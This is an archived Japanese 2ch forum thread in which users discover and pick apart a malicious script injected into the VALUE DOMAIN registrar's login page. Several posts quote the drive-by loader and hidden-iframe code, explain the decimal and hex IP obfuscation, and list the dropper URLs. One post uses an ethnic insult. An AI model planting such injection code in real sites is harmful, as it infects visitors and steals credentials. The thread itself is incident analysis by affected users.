[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2chのread.cgiへ]
Update time : 05/09 13:30 / Filesize : 155 KB / Number-of Response : 714
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]

↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

VALUE DOMAINってどうよ? part33

1 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 06:18:47 0]
VALUE DOMAIN:バリュードメイン
https://www.value-domain.com/
サポート
https://www.value-domain.com/support.php
sb.xrea.com/forumdisplay.php?f=21

◆前スレ
VALUE DOMAINってどうよ? part32
pc11.2ch.net/test/read.cgi/hosting/1239851317/

29 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:22:28 0]
>>6

ttp://1856317799:888/s.js
のことかな
確かにパスーワード入力欄の下に埋め込まれてる

1856317799のIPアドレスは110.165.41.103
>>7
のIPと一致するけど、
正常なスクリプトか、ウイルスか、パス抜きか・・・

なんかよく分からんが、ログインするのはヤメとくか

30 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:29:50 0]
なんだかなあ・・・
あっちもこっちもボロが出てるなぁ・・・

31 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:31:42 0]
>>29
これか・・・
<SCRIPT LANGUAGE="JAVASCRIPT">
    var js = document.createElement("script");
    js.src = "http://1856317799:888/s.js";
    try {document.getElementsByTagName('head')[0].appendChild(js);}
    catch(exp){}
    js = null;
</SCRIPT>

さっきログインしてしまった・・・orz

32 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:41:57 0]
s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf(”O=”)==−1)

    var js = document.createElement(’iframe’);
    js.src = ”http:¥/¥/0x6EA52967:888/dir/show.php”;
    js.width=0;
    js.height=0;
    try {document.getElementsByTagName(’head’)[0].appendChild(js);}
    catch(exp){}
    js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”O=Yes;path=/;expires=”+expires.toGMTString();
}/*dasdadadsadasdas*/

33 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:44:36 0]
何これpass抜きか何か?

34 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:45:36 0]
safeweb.norton.com/report/show?name=110.165.41.103

Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。

見つかった脅威の合計: 8

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d6.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/en.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d7.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d9.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/fd.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/wa.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/yg.dll

脅威名: Bloodhound.Exploit.193
場所: tp://110.165.41.103:888/swf/ia115-2.swf

35 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:51:16 0]
このセキュリティの甘さは何なんだお?

36 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:53:58 0]
完全に投げ出したか

37 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:22 P]
俺のガマン汁もそろそろ限界だ。



38 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:57 0]
これは
www.value-domain.com/
が乗っ取られたと解釈した方がいいのか?


39 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:05:00 0]
wikiwikiもやられてるみたいだな。GENO系統だろ。
ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね?

40 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:01 0]
どうりで今日はデジロ社員が2ch工作してない訳だw
多分今頃、事務所は修羅場なんだろw

41 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:59 0]
かんべんしてよマジで
IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない

42 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:13:29 0]
大丈夫かよデジロ

43 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:16:25 0]
>>40
多分、社員はまだ気がついていないんじゃないかな
javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね


44 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:27 0]
もしパス抜かれてたら、パス変更したら大丈夫なの?

45 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:31 P]
そもそも書き換えられたことが問題。


46 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:47 0]
一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考
差し替えたら取れなくなる資料は今のうちに取っておいて、
あとは原因追究、恒久的対応だろ

47 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:49 0]
初心者的質問ですまんのだが、>>29にあるようなURLでどうして接続できるの?
あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの?
教えてエロい人。



48 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 18:39:08 0]
とりあえず、マスコミに報告だ。

そうでもしなきゃ、隠蔽するだろ、ここ。

49 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:40:48 0]
>>47
1856317799 = 0x6EA52967 = 110.165.41.0

50 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:41:30 0]
すまん、

1856317799 = 0x6EA52967 = 110.165.41.103



51 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:52:04 0]
0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。
ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったw
スレ汚し失礼しました。

52 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:57:31 0]
こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では
まず使われないからな


53 名前:sage [2009/07/06(月) 19:00:14 0]
>>51
なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。


54 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:01:56 0]
0xではじまるのは16進数

55 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:02:50 0]
ところで、ns1-3.value-domain.com がひけないんだが、俺だけ?

56 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 19:04:48 0]
110.165.32.0/19は香港のアドレスブロックか
相変わらず中国人はクソ以下だな

57 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:05:58 0]
ns2が引けないな。1と3は引ける



58 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:08:30 0]
>>55
そんなのもう5月の終わりからだぞw

59 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:09:29 0]
ネームサーバも酷いな、とりあえずenomにして
あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく

60 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:11:26 0]
しっかし、これだけ対応悪いと、
過去に隠蔽された情報漏洩やハッキング被害がイパーイあるのでは?と疑いたくなる。


61 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 19:13:01 0]
とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。

GIGAZINE、期待してるよ。

62 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:14:05 0]
>>51
1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103

0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる:

0x6EA52967 → 0x6E 0xA5 0x29 0x67
0x6E = 110
0xA5 = 165
0X29 = 41
0x67 = 103

63 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:17:27 0]
>>62
もういいって
ping 1856317799
とでも打てばすぐに分かることだし


64 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:19:21 0]
惰性のみでM調教受け続けてきましたがさすがにもう無理です。
ごめんなさいドSデジロご主人様。

65 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:20:43 0]
・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。


66 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:24:00 0]
>>65

>>16

先月1日あたりからアナウンスも一切無くずっと放置だよ

67 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:28:58 P]
とりあえず垢のパスは変えた方がいいのかな?どうなのかな?



68 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:31:50 0]
おちおちコンパネにログインすらできんってどうよ
移管もできねーじゃん

69 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:32:13 0]
>>66

これって死にッぱなし・・・じゃないよね?
だったらHPもメールも動かなくなるわけだし。



70 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:35:33 0]
>>69
orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。


71 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:44:32 P]
知らずにログインしてた…
念のためJavaSciprt無効化してからログインしてパスワード変更したよ。

72 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:57:50 0]
>>67
コンパネのパスを抜かれるって事はxreaのログイン情報から
メールのパスワードまで全部つながって見えるって事だから
とりあえず、JavaSciprtをoffにしてパスワードを変更した。

73 名前:72 mailto:sage [2009/07/06(月) 20:04:17 0]
追加。
よく考えたらxreaどころじゃねぇ、
抜かれたパスワードからさらに他のパスワードに換えられたら、
こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。
ログイン履歴をメモしておかないとな。
自分が寝ているハズの時間のログイン記録があるかもよ。

74 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:07:31 0]
わざわざ今ログインしてる人って頭XXXXX

75 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:15:16 0]
改ざんされてる割には
あまり騒いでないな


76 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:27:01 0]
JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では?
つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。
今はログインせずに、アナウンスを待つよりほかない。


77 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:29:44 0]
他社で取得したco.jpドメイン運用しているんだけど、
NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと?





78 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:31:10 0]
まさか本当にGENO系?
それならvalue-domain.comのFTPパス抜かれたってことか
最悪だ

79 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:36:44 0]
GENO系かどうかはわからないけど、login.phpが改竄されたってことは
少なくともftpの垢パスが漏れていると言う事実は変わらない。
もしかしたらもっと上位の垢パスの可能性だってある。

80 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:58:10 0]
ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか
これ、どう処理するんだろ
適当にパスワード変更してください、って告知して、また100日無料期間追加程度で終わるのかな

81 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 21:49:42 0]
やばいよよばいよ

82 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 21:52:07 0]
まだ直ってないの?

83 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:12:14 0]
>>32のs.jsって本当にあるね……
俺、javascriptってよくわかんないんだけど、
ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと?

84 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:14:53 0]
この先いったいどうなることやら

85 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:20:19 P]
www.value-domain.com/login.php

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>


https://www.value-domain.com/login.php
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>

当たり前だけ両方あるな


86 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:27:49 P]
s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("O=")==-1)
{
var js = document.createElement('iframe');
js.src = "http:\/\/0x6EA52967:888/dir/show.php";
js.width=0;
js.height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="O=Yes;path=/;expires="+expires.toGMTString();
}/*dasdadadsadasdas*/


http:\/\/0x6EA52967:888/dir/show.php

110.135.41.103/dir/show.php

87 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:31:58 0]
To: 85-86

>>31-32がなぜわざわざ全角にしたのか, >>34がなぜhttpでなくtpにしたのか,
考えてみよう.



88 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:33:17 0]
>>85
>>86
既出
上で書いてあることをいちいち書き込まなくてよろしい
しかも香港鯖にリンクを貼るなや

89 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:40:35 0]
ウィルスURLを張るのは普通に通報対象です

90 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:46:18 0]
で、肝心のデジロは把握してるの?

91 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:49:31 0]
把握していないのでは?
<script>〜</script>を削除するくらい一瞬で終わる

92 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:51:23 0]
誰かが魚拓とってくれたみたいだ。

ttp://s03.megalodon.jp/2009-0706-1843-51/https://www.value-domain.com/login.php

93 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:52:08 0]
試しに問題のURLを確認してみた

問題の飛ばされる先のm.htmに、ノーガードで突っ込んでみると、
XPだと、
ドライブ:/Documents and Settings/ユーザ名/Application Data
のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか

詳細は不明
何かがやられているのは確かだ

実験するのは自己責任で

94 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:56:05 0]
つーことは、ログインするとパスが抜かれるのではなく、
ログインページを開くだけで感染するってこと?

95 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:59:41 0]
>>93に追記

ログをおったら、Keyloggerを検知した
やはりパスワード抜きで確定だと思う

96 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:06:19 0]
要は javascript 実行させない環境で見れば
問題ないのかな

普段はFireFox+ NoScriptで普段はjavascript
実行させないようにしてるけど・・・

97 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:07:53 0]
>>95に追記

カスペルスキーを実行させながら再実験するとこんな感じになった
そんなスクリーンショット
ttp://www.dotup.org/uploda/www.dotup.org209036.jpg

これは酷い



98 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:12:33 0]
login.phpに<script>を埋め込むことができるなら、
login.phpのログイン時の処理にも細工がしてある可能性もある

JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難


99 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:13:36 P]
>>93
踏んだけどなかったなぁ
そもそもそのURL鯖落ちしてないか?

100 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:16:19 0]
ttps://www.value-domain.com/login.php
にアクセスするだけで感染?

101 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:19:14 0]
>>98
確かにそうだね
しかしそろそろドメインの更新できないと困る・・・

しかも他ではあんまり扱ってないドメインだから
移管するのも面倒だし

102 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:22:45 0]
Windows以外のOSかVistaでアクセスした方がいいね

103 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:23:20 0]
>>93 >>95 >>97だけど、こうなるのは本当に全くなにも対策してない場合だけだと思う。完全にXPをノーガードの素の状態で試したから
ちゃんと最新のセキュリティソフト入ってるなら大丈夫、だとは思う
カスペルスキーを立ち上げた状態でウイルスらしき実行ファイルやったら、なんか防いでるっぽかった。ブラウザがフリーズしたけど

m.htmのほうはこんな感じ、show.phpのほうは何も吐き出してこないから、何やってるか全く不明。

正直、なんともいえんけど、
とりあえず、実験に使ったPCは念を入れて、リカバリ中

104 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:26:20 0]
>>101
ccTLDは基本的に移管できないよ
認証鍵があるtvは移管できるかもしれないけど

105 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:27:24 0]
>>102
HDDはずしてubuntuをCD-ROMブートで使うのが
セキュリティ上いいのかしら(´・ω・`)

Winのセキュリティソフトもすぐ対応してくれないと
意味ないし・・・

106 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:28:31 0]
avastは検出してくれないなぁ〜
このキーロガーは、VDのパスを狙っているのではなく、
VD利用者が日頃入力するパスを狙ってるってことかな?

107 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:35:44 0]
GENO系統ならフラッシュかPDFで感染させてFTPパスを抜いてそのパス使ってサイトの改竄する。




108 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:42:28 0]
>>102
phpの内部処理まではサーバのほうで処理することでこっちはなにも見れないから、そこまで改ざんということなら、もうOS関係ないと思う
ログインすることそれ自体が危険

109 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:47:00 O]
夕方ログインした
もう、手遅れだろうから
全部諦める事にしたよ
大規模な改ざんが来そうだね

110 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:04:41 0]
ログイン出来なきゃサポにも連絡できねえ。
問題が大きくなる前に対処しないとやばいんじゃね?

111 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:16:30 0]
今は消えてるみたい。やっと気づいたかな?
でも、相変わらず報告なしだなぁ

112 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:20:36 0]
今北
何?ログインページにロガー仕込まれたの?マジで??
今確認する分にはヘンなスクリプトは入ってなさげだけど…
マジで仕込まれていたなら事は重大だなあ

デジロは早急に今判っていることだけでもアナウンスすべき

113 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:25:57 0]
本当だ、いつのまにかなくなってる
でも、>>92で魚拓もうとられてるし、これはさすがにアナウンス無しってことはないと思・・・・・・いたい
この期間にログインしてた人は、気がついたら自分のところ改ざんされてもおかしくないしな

114 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:26:31 0]
社員がここを見て気づくというオチ

115 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:30:46 0]
多分直接関係ないとはいえ、
お知らせ欄の「セキュリティ強化について」の文字が妙にむなしく感じる…


116 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:40:06 0]
ユーザーが視認できるJavaScriptが削除されたにせよ、login.phpの内部処理が改竄されていたかどうかはユーザーには分からない。
一見対応されたかに見えても、プログラム内部の見えない部分まで確認したのかどうかは、VDのアナウンスを待つしかない。

login.phpが改竄されていたことには変わらない。
まだ危険は去っていないと考えるべきで、アナウンスがあるまでログインはおろか、
ttps://www.value-domain.com/login.php
を開くことも控えるべき

117 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:44:17 0]
DNSくらいは別に他使えばよかったけど、これはさすがにやっちまったなぁ……
VDは前、サーバー復旧できなくてサーバ丸ごと初期化したこともあったけど、
今回の問題はどこまで被害がでてるかわからないから、それなみのクラスの問題だな



118 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:52:06 P]
ふぅ、
とりあえずjs切ってパス変えて、あどべ関連も一応最新チェックしといた。

俳人(廃人)の俺がここで一句
面倒くせぇ あぁ面倒くせぇ 面倒くせぇ

119 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:53:06 0]
>>116
login.phpが書き換えられたというよりも、
login.phpから読み込まれる別のファイルなりデータベースなりが書き換えられてるような気がする。
ユーザー名、パスワード、挿入されたscriptタグが、同じ形に整えられてるからな。
よくあるSQLインジェクションみたいなもんじゃないかなー

120 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:53:39 0]
改竄されていたのは login.php だけだったのか?
という疑問も残っている。

ログイン情報は、cookieに保存されるので、各ページのphpファイル内でcookieデータが送受信される。つーことは全phpファイルに改竄がなかったかチェックする必要がある。
どのページからでも情報漏洩の危険はあるってことだ。
さらに各phpファイルが内部でインクルードしていれば、そのファイルも全てチェックする必要がある。

このくらいできるよね>VD社員

121 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:59:41 0]
とりあえずサポートフォームから
「事は重大だから最低でも朝イチでアナウンスが欲しい」
っと送っておいた
質問カテゴリ=利用前質問ならログイン無しでも送信できるしな
今の状況下でログインなんか怖くてできない

122 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:11:13 0]
スレをちゃんと読まずに、>>72>>118と同様、ログインしてパス変えてしまった

login.phpの内部処理が改竄されていた場合、ログインしたユーザーには
どんな被害があるの。whois情報が流出くらいならまだ許容できるんだけど

123 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:12:38 0]
phpまでやられてたら、サーバでできることはほとんどなんでもできるよ

124 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:22:21 0]
まあとにかく今は、VDの鯖がどの程度の被害を被ったのかアナウンスを待とうや

phpの内部処理が改竄されている可能性を考慮すると、
・JavaScriptをOFFにしてログインする
・以前のログイン情報がcookieに残っているユーザー(ログイン状態を維持しているユーザー)が、VDのサイトを開く

ってのも控えたほうがいいと思われる。

つまりアナウンスを見に行くのですら気を使う必要があるかもね
既存のcookieを削除してから訪問するとか、ブラウザを変えるとか・・・


125 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:27:20 P]
>アナウンスを待とうや

そのアナウンスが、素直に出てくるとでも思っているのかい?

126 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:36:45 0]
んなこた知るか
当然すべきことを期待しているだけだ

通信法、個人情報保護法etc・・・VDがどこまで法を犯すのかというのも楽しみではあるがね


127 名前:名無しさん@お腹いっぱい。 [2009/07/07(火) 01:50:45 0]
当然すべきことを期待しているだけだ(大爆笑)



128 名前:名無しさん@お腹いっぱい。 [2009/07/07(火) 02:02:31 0]
たまたま見たらこんなことに・・・涙
ドメイン100個以上使っているのでドビックリしてます。

129 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 02:10:20 0]
>>128
何度目のビックリですか?




[ 続きを読む ] / [ 携帯版 ]
前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<155KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef